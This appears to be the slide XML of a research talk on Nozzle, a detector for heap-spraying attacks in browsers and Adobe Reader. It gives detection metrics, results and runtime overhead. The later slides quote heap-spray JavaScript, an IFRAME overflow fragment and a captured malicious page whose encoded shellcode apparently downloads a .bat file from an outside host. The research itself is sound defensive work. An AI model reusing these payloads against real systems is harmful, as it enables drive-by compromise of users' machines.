              <a:ext cx="418704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4514" y="5486400"/>
              <a:ext cx="418704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27714" y="1143000"/>
              <a:ext cx="418704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4514" y="4876800"/>
              <a:ext cx="418704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70514" y="2819400"/>
              <a:ext cx="418704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34400" y="3581400"/>
              <a:ext cx="418704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&quot;No&quot; Symbol 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7696200" y="4419600"/>
            <a:ext cx="381000" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="noSmoking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2800" y="3200400"/>
            <a:ext cx="19050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Nozzle Global Heap Metric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>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{7EBD1453-4CAE-459E-B186-079CC19DEE63}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:pPr algn="r">
                <a:defRPr/>
              </a:pPr>
              <a:t>15</a:t>
            </a:fld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239869"/>
            <a:ext cx="117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build CFG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916269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dataflow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2" descr="C:\Documents and Settings\b-parujr\Desktop\talk\cfg-google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3697069"/>
            <a:ext cx="1219200" cy="156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/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6400800" y="1524000"/>
            <a:ext cx="685800" cy="1143000"/>
            <a:chOff x="6400800" y="1295400"/>
            <a:chExt cx="685800" cy="1143000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rectangle 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6400800" y="1295400"/>
              <a:ext cx="6858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1524000"/>
              <a:ext cx="6858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1752600"/>
              <a:ext cx="6858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0800" y="1981200"/>
              <a:ext cx="6858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0800" y="2209800"/>
              <a:ext cx="6858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19800" y="5906869"/>
            <a:ext cx="1922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Compute threat of</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>single block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6059269"/>
            <a:ext cx="1922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Compute threat of</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>single object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230469"/>
            <a:ext cx="167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Compute threat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>of entire heap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487269"/>
            <a:ext cx="258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Normalize to (approx):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>P(jump will cause exploit)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mj-lt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62400" y="1676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D603E6-D1CA-4B35-B3FE-A5B5E8B64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9D603E6-D1CA-4B35-B3FE-A5B5E8B64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4910B3-A3E3-4FB6-8173-F3EA353F6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84910B3-A3E3-4FB6-8173-F3EA353F6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FC4A4-AF3C-486B-982F-75194A1D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EEFC4A4-AF3C-486B-982F-75194A1D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35B892-F379-43DC-B59B-A10218BC6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735B892-F379-43DC-B59B-A10218BC6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8DCEC2-04D0-4DD5-93BF-3ED86B4CD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98DCEC2-04D0-4DD5-93BF-3ED86B4CD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7964A8-5E75-4643-8E23-B9DC31C66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B7964A8-5E75-4643-8E23-B9DC31C66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C3D76-C097-44BD-8861-D5701E565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F0C3D76-C097-44BD-8861-D5701E565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22335-461B-48BA-B7B2-5C5C4823A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7E22335-461B-48BA-B7B2-5C5C4823A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DD902-AE6A-4281-915A-FCF738B9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A7DD902-AE6A-4281-915A-FCF738B9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8C96F-64FA-4EBF-8D28-682A05591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46E8C96F-64FA-4EBF-8D28-682A05591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FE44DC-8BC8-406D-AC6C-5B9DF13F9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0EFE44DC-8BC8-406D-AC6C-5B9DF13F9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3E440-24ED-4D0A-B594-1FB1A7964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E33E440-24ED-4D0A-B594-1FB1A7964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uiExpand="1"/>
      <p:bldP spid="7" grpId="0" uiExpand="1"/>
      <p:bldP spid="15" grpId="0" uiExpand="1"/>
      <p:bldP spid="16" grpId="0" uiExpand="1"/>
      <p:bldP spid="17" grpId="0" uiExpand="1"/>
      <p:bldP spid="18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Nozzle Experimental Summary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7EBD1453-4CAE-459E-B186-079CC19DEE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Nozzle on Benign Sites</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5939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3622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Benign sites have low Nozzle NSA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Max NSA always less than 12%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Thresholds can be set much higher for detection</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(50% or more)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43B78C-8E1F-40E7-A919-D02376109FD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54570"/>
            <a:ext cx="6019800" cy="570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with Known Heap Sprays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76600" cy="3886199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US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>12 published heap spray pages in multiple browsers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smtClean="0"/>
              <a:t>2,000 synthetic heap spray pages using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>MetaSploit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pPr marL="922337" lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>advanced NOP engine </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="922337" lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> database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769F-FB87-4E34-A81F-BC354A36C9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02680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83123" y="5334000"/>
            <a:ext cx="64892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2287"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Result: max NSA between 76% and 96%</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Nozzle detects real spraying attacks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Nozzle Runtime Overhead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1BC44A-C8DD-46E8-BF30-29858D5AE64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25701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Spraying is a Problem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1219200"/>
            <a:ext cx="6931822" cy="3767137"/>
            <a:chOff x="6781800" y="1828800"/>
            <a:chExt cx="6931822" cy="3767137"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="10" name="Group 9"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6781800" y="1828800"/>
              <a:ext cx="6931822" cy="3767137"/>
              <a:chOff x="1676400" y="1905000"/>
              <a:chExt cx="6931822" cy="376713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1905000"/>
                <a:ext cx="6931822" cy="3767137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495800" y="4114800"/>
                <a:ext cx="22098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Firefox 3.5</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
                  <a:t>July 14, 2009</a:t>
                </a:r>
              </a:p>
              <a:p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370465" y="2209800"/>
              <a:ext cx="42787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hlinkClick r:id="rId3"/>
                </a:rPr>
                <a:t>http://www.web2secure.com/2009/07/mozilla-firefox-35-heap-spray.html</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0"/>
                <a:t> </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="105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27124" y="82920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/>
              <a:t>Adobe Acrobat/Reader</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>July 23, 2009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" y="1295400"/>
            <a:ext cx="5129448" cy="4525963"/>
            <a:chOff x="1676400" y="1447800"/>
            <a:chExt cx="5129448" cy="452596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653" t="16836" r="8039" b="7401"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1676400" y="1447800"/>
              <a:ext cx="5129448" cy="4525963"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875" cap="sq">
              <a:solidFill>
                <a:schemeClr val="tx2"/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2133600" y="51816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b="1" dirty="0" smtClean="0"/>
                <a:t>Adobe Acrobat / Reader </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="r"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
                <a:t>February 19, 2009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1600" y="1595735"/>
            <a:ext cx="6172200" cy="5262265"/>
            <a:chOff x="228600" y="1371600"/>
            <a:chExt cx="6172200" cy="52622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1371600"/>
              <a:ext cx="6153150" cy="512504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114800" y="2971800"/>
              <a:ext cx="2209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/>
                <a:t>Flash</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="r"/>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
                <a:t>July 23, 2009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6172200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hlinkClick r:id="rId6"/>
                </a:rPr>
                <a:t>http://</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0">
                  <a:hlinkClick r:id="rId6"/>
                </a:rPr>
                <a:t>blog.fireeye.com/research/2009/07/actionscript_heap_spray.html</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
                <a:t> </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US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81200" y="2667000"/>
            <a:ext cx="53340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2">
                <a:alpha val="99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Common Element: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All vulnerable  applications support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embedded scripting languages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(JavaScript, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ActionScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, etc.)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Nozzle in Adobe Reader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AcroRd32.exe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3276600"/>
            <a:ext cx="2438400" cy="914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nozzlert.dll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2362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Detours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1828800"/>
            <a:ext cx="23622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det-AcroRd32.exe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3124200" y="2286000"/>
            <a:ext cx="457200" cy="1981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43600" y="2286000"/>
            <a:ext cx="457200" cy="1981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4442460" y="2948940"/>
            <a:ext cx="457200" cy="1981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43434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Results</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>- Detected a published heap spray attack (NSA &gt; 75%)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>- Runtime overhead was 8% on average</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>- NSA of normal document &lt; 10%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Heap spraying attacks are</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Easy to implement, easy to retarget</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In widespread use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Existing detection methods fail to classify malicious objects on x86 architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Nozzle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Effectively detects published attacks (known and new)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Has acceptable runtime overhead</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can be used both online and offline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Drive-By Heap Spraying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4478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17526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398" y="20574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0"/>
            <a:ext cx="1905000" cy="17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1271835" cy="16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 rot="4026215">
            <a:off x="3976505" y="1726290"/>
            <a:ext cx="374219" cy="3587493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zorn\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YCXYHT46\j04325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286000"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Explosion 1 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3276600"/>
            <a:ext cx="3276600" cy="2590800"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal1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Owned!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222 L -0.48333 0.27752 " pathEditMode="relative" ptsTypes="AA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Drive-By Heap Spraying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17526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398" y="20574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1905000" cy="17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1271835" cy="16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zorn\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YCXYHT46\j043259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0"/>
            <a:ext cx="914400" cy="9144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4026215">
            <a:off x="3976505" y="1726290"/>
            <a:ext cx="374219" cy="3587493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5200" y="3657600"/>
            <a:ext cx="5334000" cy="2893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AFDDB" mc:Ignorable="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endParaRPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="00B050" mc:Ignorable="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&lt;SCRIPT language="text/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("%u4343%u4343%...'');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&lt;/SCRIPT&gt;</a:t>
            </a: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</a:br>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="00B050" mc:Ignorable="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&lt;IFRAME </a:t>
            </a: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SRC=file://BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB … NAME="CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC …</a:t>
            </a:r>
          </a:p>
          <a:p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urier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&amp;#3341;&amp;#3341;"&gt;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&lt;/IFRAME&gt;</a:t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>&lt;/HTML&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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" y="2133600"/>
            <a:ext cx="27432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9600" y="2286000"/>
            <a:ext cx="609600" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="92D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00200" y="25908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66800" y="3200400"/>
            <a:ext cx="609600" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="92D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4724400" y="2743200"/>
            <a:ext cx="2743200" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -36753"/>
              <a:gd name="adj2" fmla="val 87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Creates the malicious object</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1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5562600" y="3886200"/>
            <a:ext cx="2743200" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -36753"/>
              <a:gd name="adj2" fmla="val 87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Triggers the jump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1676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Heap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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286000" y="1219200"/>
            <a:ext cx="2743200" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -36753"/>
              <a:gd name="adj2" fmla="val 87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ASLR  prevents  the attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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286000" y="2895600"/>
            <a:ext cx="22860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00400" y="2590800"/>
            <a:ext cx="5334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PC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  <a:endCxn id="50" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2209800" y="2781300"/>
            <a:ext cx="990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5834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1667 0.0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25 -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0" grpId="1" animBg="1"/>
      <p:bldP spid="51" grpId="0" animBg="1"/>
      <p:bldP spid="54" grpId="0" animBg="1"/>
      <p:bldP spid="5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Drive-By Heap Spraying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17526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398" y="2057400"/>
            <a:ext cx="991541" cy="1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1905000" cy="17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1271835" cy="16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zorn\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\YCXYHT46\j043259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0"/>
            <a:ext cx="914400" cy="9144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4026215">
            <a:off x="3976505" y="1726290"/>
            <a:ext cx="374219" cy="3587493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3505200"/>
            <a:ext cx="5334000" cy="2893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AFDDB" mc:Ignorable="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>&lt;SCRIPT language="text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1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1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("%u4343%u4343%...'');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oneblock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("%u0C0C%u0C0C");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fullblock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oneblock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fullblock.length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&lt;0x40000)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fullblock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fullblock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sprayContainer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Array();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nn-NO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nn-NO" sz="1400" b="1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nn-NO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400" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(i=0; i&lt;1000; i++)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sprayContainer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fullblock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ourier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/SCRIPT&gt;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2133600"/>
            <a:ext cx="27432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2286000"/>
            <a:ext cx="609600" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="92D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26670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3200400"/>
            <a:ext cx="609600" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="92D05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676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Heap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362200" y="23622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32766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28194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22098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2200" y="2819400"/>
            <a:ext cx="6096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638800" y="3886200"/>
            <a:ext cx="2743200" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -36753"/>
              <a:gd name="adj2" fmla="val 87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Allocate 1000s of malicious objects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" dirty="0"/>
              <a:t>&lt;HTML&gt;  &lt;!-- from http://ournature.net/12.htm --&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>  &lt;BODY&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>    &lt;object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>classid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>="clsid:F3D0D36F-23F8-4682-A195-74C92B03D4AF" name="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>xskj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>" width=100 height=200</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" smtClean="0"/>
              <a:t>&gt;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>&lt;/object&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>    &lt;script&gt;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qvod0 = "%u7468%u7074%u2f3a%u772f%u7777%u6f2e%u7275%u616e%u7574%u6572%u6e2e%u7465%u582f%u2e32%u6162%u0074";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qvod1 = "%u56f5%u768b";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" smtClean="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>shellshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t> = "%u9090%u9090%u54eb%u758b%u8b3c%u3574%u0378" + </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>      qvod1 + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" smtClean="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>"%u0320%u33f5%u49c9%uad41%udb33%u0f36%u14be%u3828%u74f2%uc108%u0dcb%uda03%ueb40%u3bef%u75df%u5ee7%u5e8b%u0324%u66dd%u0c8b%u8b4b%u1c5e%udd03%u048b%u038b%uc3c5%u7275%u6d6c%u6e6f%u642e%u6c6c%u4300%u5c3a%u2e55%u7865%u0065%uc033%u0364%u3040%u0c78%u408b%u8b0c%u1c70%u8bad%u0840%u09eb%u408b%u8d34%u7c40%u408b%u953c%u8ebf%u0e4e%ue8ec%uff84%uffff%uec83%u8304%u242c%uff3c%u95d0%ubf50%u1a36%u702f%u6fe8%uffff%u8bff%u2454%u8dfc%uba52%udb33%u5353%ueb52%u5324%ud0ff%ubf5d%ufe98%u0e8a%u53e8%uffff%u83ff%u04ec%u2c83%u6224" +"%ud0ff%u7ebf%ue2d8%ue873%uff40%uffff%uff52%ue8d0%uffd7%uffff" + </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>      qvod0 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smtClean="0"/>
              <a:t>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heapSprayToAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t> = 0x05050505;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shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>unescape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>shellshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>);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heapBlockSize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t> = 0x400000;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payLoadSize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>shellcode.length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t> * 2;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spraySlideSize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>heapBlockSize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t> - (payLoadSize+0x38);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uun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t> = "%u0505%u0505"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var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>spraySlide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>unescape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>uun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>);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spraySlide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>getSpraySlide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>spraySlide,spraySlideSize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>heapBlocks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t> = (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>heapSprayToAddress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t> - 0x400000)/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" err="1"/>
              <a:t>heapBlockSize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>    memory = new Array();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
